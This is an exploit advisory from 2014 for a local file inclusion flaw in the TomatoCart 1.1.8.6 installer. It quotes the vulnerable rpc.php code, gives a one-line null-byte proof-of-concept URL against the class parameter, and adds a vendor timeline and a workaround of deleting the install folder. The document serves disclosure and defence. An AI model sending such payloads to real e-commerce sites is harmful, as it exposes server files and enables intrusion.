facebook facebook twitter rss

TomatoCart 1.1.8.6 Local File Inclusion Vulnerability

Author: TUNISIAN CYBER , Published: 14-02-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: TomatoCart 1.1.8.6 Local File Inclusion Vulnerability
[+] Date: 14-02-2014
[+] Category: WebApp
[+] Tested on: KaliLinux
[+] Vendor: http://www.tomatocart.com/
[+] Friendly Sites: na3il.com,th3-creative.com

1.OVERVIEW:
TomatoCart 1.1.8.6 (old versions too) suffers from a LFI Vulnerability.
More Info about LFI:
https://www.netsparker.com/local-file-inclusion/

2.Background:
TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions.
It's distributed under the terms of the GNU General Public License (or "GPL"),
free to download and share.
The community, including project founders and other developers,
are supposed to work together on the platform of TomatoCart, contributing features, technical support and services.
http://www.tomatocart.com/about-us/about-tomatocart.html

3.Vulnerability:
File : /install/rpc.php Lines:21--->44
[PHP]
if (isset($_GET['action']) && !empty($_GET['action'])) {
switch ($_GET['action']) {
case 'dbCheck':
$db = array('DB_SERVER' => trim(urldecode($_GET['server'])),
'DB_SERVER_USERNAME' => trim(urldecode($_GET['username'])),
'DB_SERVER_PASSWORD' => trim(urldecode($_GET['password'])),
'DB_DATABASE' => trim(urldecode($_GET['name'])),
'DB_DATABASE_CLASS' => trim(urldecode($_GET['class']))
);

$osC_Database = osC_Database::connect($db['DB_SERVER'], $db['DB_SERVER_USERNAME'], $db['DB_SERVER_PASSWORD'], $db['DB_DATABASE_CLASS']);

if ($osC_Database->isError() === false) {
$osC_Database->selectDatabase($db['DB_DATABASE']);
}

if ($osC_Database->isError()) {
echo '[[0|' . $osC_Database->getError() . ']]';
} else {
echo '[[1]]';
}

exit;
break;
[PHP]

4.Proof Of Concept:
127.0.0.1/install/rpc.php?action=dbCheck&class=LFI%00

5.Solution(s):
No Patch was released.
Delete "/install/" Folder.

6.TIME-LINE:
2014-02-13: Vulnerability was discovered.
2014-02-13: Contact with vendor.
2014-02-14: Vendor said it's NOT a Vulnerability
2014-02-14: Vulnerability Released

7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members

Like us on Facebook :